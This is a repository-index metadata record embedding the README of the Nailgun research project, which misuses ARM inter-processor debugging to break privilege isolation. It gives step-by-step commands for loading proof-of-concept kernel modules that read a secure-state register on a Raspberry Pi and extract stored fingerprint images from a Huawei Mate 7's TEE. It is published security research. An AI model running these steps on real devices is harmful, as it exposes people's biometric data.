{"id":13654074,"url":"https://github.com/ningzhenyu/nailgun","last_synced_at":"2025-04-23T07:30:30.193Z","repository":{"id":95492111,"uuid":"168411356","full_name":"ningzhenyu/nailgun","owner":"ningzhenyu","description":"Nailgun attack on ARM devices.","archived":false,"fork":false,"pushed_at":"2021-05-13T02:49:48.000Z","size":55,"stargazers_count":152,"open_issues_count":2,"forks_count":26,"subscribers_count":7,"default_branch":"master","last_synced_at":"2024-11-10T04:38:30.550Z","etag":null,"topics":["android","arm","attack","debugging","exploit","fingerprint","huawei-mate7","proof-of-concept","raspberry-pi","security","tee","trustzone","vulnerabilities"],"latest_commit_sha":null,"homepage":"http://compass.sustech.edu.cn/nailgun/","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ningzhenyu.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-01-30T20:36:46.000Z","updated_at":"2024-09-12T11:26:24.000Z","dependencies_parsed_at":"2023-03-22T20:30:14.382Z","dependency_job_id":null,"html_url":"https://github.com/ningzhenyu/nailgun","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ningzhenyu%2Fnailgun","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ningzhenyu%2Fnailgun/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ningzhenyu%2Fnailgun/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ningzhenyu%2Fnailgun/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ningzhenyu","download_url":"https://codeload.github.com/ningzhenyu/nailgun/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":250390816,"owners_count":21422784,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["android","arm","attack","debugging","exploit","fingerprint","huawei-mate7","proof-of-concept","raspberry-pi","security","tee","trustzone","vulnerabilities"],"created_at":"2024-08-02T02:01:23.108Z","updated_at":"2025-04-23T07:30:29.926Z","avatar_url":"https://github.com/ningzhenyu.png","language":"C","funding_links":[],"categories":["Exploit"],"sub_categories":[],"readme":"\n# Nailgun: Break the privilege isolation in ARM devices\n\n## Overview\nProcessors nowadays are consistently equipped with debugging features to facilitate the program debugging and analysis. Specifically, the ARM debugging architecture involves a series of CoreSight components and debug registers to aid the system debugging, but the security of the debugging features is under-examined since it normally requires physical access to use these features in the traditional debugging model.\n\nThe idea of Nailgun Attack is to misuse the debugging architecture with the inter-processor debugging model. In the inter-processor debugging model, a processor (debug host) is able to pause and debug another processor (debug target) on the same chip even when the debug target owns a higher privilege. With Nailgun, we are able to obtain sensitive information and achieve arbitrary payload execution in a high-privilege mode.\n\nFor more details, please check our website http://compass.sustech.edu.cn//nailgun\n\n## Proof of Concept\nWe will make two PoCs available on Github:\n\n### PoC #1: Reading  Secure Configuration Register with a kernel module.\n#### Platform\n- Deivce: Raspberry PI 3 Model B+ \n- Firmware: Raspbian GNU/Linux 9.6 (stretch)\n\n#### Description\nIn this PoC, we we use a kernel module running in non-secure EL1 to read Secure Configuration Register (SCR), which is only accessiable in secure state, on Raspberry PI. The fold ```PoC/Read_SCR``` contains the source code and prebuild binaries for two kernel modules. The first kernel module _directly_read.ko_ read the SCR directly, which lead to segmentation fault. The kernel module _nailgun.ko_ leverages Nailgun attack to read the SCR\n\n#### Prepare\nIf you are going to build the kernel module from the source code, you need to install the compile tools and kernel headers with the following command,\n```\npi@raspberrypi:~/ $ sudo apt-get install build-essential raspberrypi-kernel-headers\n```\nThen, get into the source code fold, and compile the kernel module\n```\npi@raspberrypi:~/ $ cd PoC/Read_SCR\npi@raspberrypi:~/PoC/Read_SCR $ make\n```\n\n#### Run\nUse _insmod_ command to install the corresponding kernel module, and use _dmesg_ to check the kernel logs.\n```\npi@raspberrypi:~/PoC/Read_SCR $ sudo insmod directly_read.ko\npi@raspberrypi:~/PoC/Read_SCR $ dmesg\npi@raspberrypi:~/PoC/Read_SCR $ sudo insmod nailgun.ko\npi@raspberrypi:~/PoC/Read_SCR $ dmesg\n```\nThe value of the SCR can be found in the kernel log.\n\n#### Demo Video\nhttps://youtu.be/dlKK_69HJnk\n  \n### PoC #2:  Extracting the fingerprint image.\n#### Platform\n- Deivce: Huawei Mate 7 (MT-L09)\n- Firmware: MT7-L09V100R001C00B121SP05\n\n#### Description\nIn this PoC, we use a kernel module running in non-secure EL1 to extract the fingerprint image\nstored in TEE on Huawei Mate 7. The fold ```PoC/Fingerprint_Extraction``` contains the source code for the kernel module that extracts fingerprint data from TEE, a prebuild binary of the kernel module, and a python script to convert the extracted image data to a PNG file.\n\n#### Prepare\n- Make sure you have scanned a fingerprint with the fingerprint sensor.\n- Enable USB debugging on your phone and connect it to your PC. (**Nailgun attack doesn't require physical access to the phone, the connection is only used for transferring the binary to the phone and moving the output log to the PC.**)\n- Make sure you have root access on your phone.\n\n#### Run\nFirstly, push the prebuild binary into the phone\n```\nadb push nailgun.ko /sdcard/\n```\nNext, in the _adb shell_ console of the phone, install the kernel module\n```\nadb shell\nshell@hwmt7:/ $ su\nroot@hwmt7:/ # insmod /sdcard/nailgun.ko\n```\nCheck the kernel log with _dmesg_ command\n```\nroot@hwmt7:/ # dmesg\n```\nIf you can find the fingerprint data similar to this\n```\n\u003c6\u003e[   51.284149] [0.1, swapper/1] --------------------Fingerprint Start\n\u003c6\u003e[   51.284210] [0.1, swapper/1] 2ef5efac: 412f0100 87796552 e8e2dfd4 eff0eeea\n\u003c6\u003e[   51.284240] [0.1, swapper/1] 2ef5efbc: f3f3f3f3 f3f1f8f6 f3f3f2f1 eff4f4f8\n\u003c6\u003e[   51.284301] [0.1, swapper/1] 2ef5efcc: f1f0f2f0 f1f0eff3 f1f1efee efeff0ee\n\u003c6\u003e[   51.284332] [0.1, swapper/1] 2ef5efdc: e7ecefeb e8e9e8ed e6e4e3e6 e1e5e5e6\n\u003c6\u003e[   51.284393] [0.1, swapper/1] 2ef5efec: e9e5e6e4 dfe3e3e6 e4e5e5e2 e0e3e3e3\n\u003c6\u003e[   51.284423] [0.1, swapper/1] 2ef5effc: dee1e3e2 e8e6e1df eae8e6e7 eaeceeeb\n\u003c6\u003e[   51.284484] [0.1, swapper/1] 2ef5f00c: e5e3e5e5 edebe6e7 edefeff1 f1eeeff0\n\u003c6\u003e[   51.284515] [0.1, swapper/1] 2ef5f01c: e7eaebea e9e9e8e5 e6e7eaeb e4e5e4e2\n\u003c6\u003e[   51.284576] [0.1, swapper/1] 2ef5f02c: e7e9e8e8 e5e6e7e6 e7eae7ea e2e4e4e5\n```\nthen the PoC works.\nNext, dump the kernel log to file, and extract the file from the phone to your PC\n```\nroot@hwmt7:/ # dmesg \u003e /sdcard/nailgun.log\nroot@hwmt7:/ # exit\nshell@hwmt7:/ $ exit\nadb pull /sdcard/nailgun.log .\n```\nFinally, use the python script to convert the fingerprint data to a PNG file\n```\npython log2image.py nailgun.log\n```\nYou will find the extracted fingerprint images are stored into PNG files naming _fingerprint\\_x.png_, in which _x_ means the index of the image.\n\n#### Demo Video\nhttps://youtu.be/5ioyneewFYQ\n\n## Publication\n```\n@InProceedings{nailgun19,\n\tTitle = {Understanding the security of ARM debugging features},\n\tAuthor = {Zhenyu Ning and Fengwei Zhang},\n\tBooktitle = {Proceedings of the 40th IEEE Symposium on Security and Privacy (S\u0026P'19)},\n\tYear = {2019}\n}\n```\n\n## Contact\n- Zhenyu Ning\n- ningzy _at_ sustech.edu.cn\n- Compass Lab, Wayne State University (http://compass.sustech.edu.cn/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fningzhenyu%2Fnailgun","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fningzhenyu%2Fnailgun","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fningzhenyu%2Fnailgun/lists"}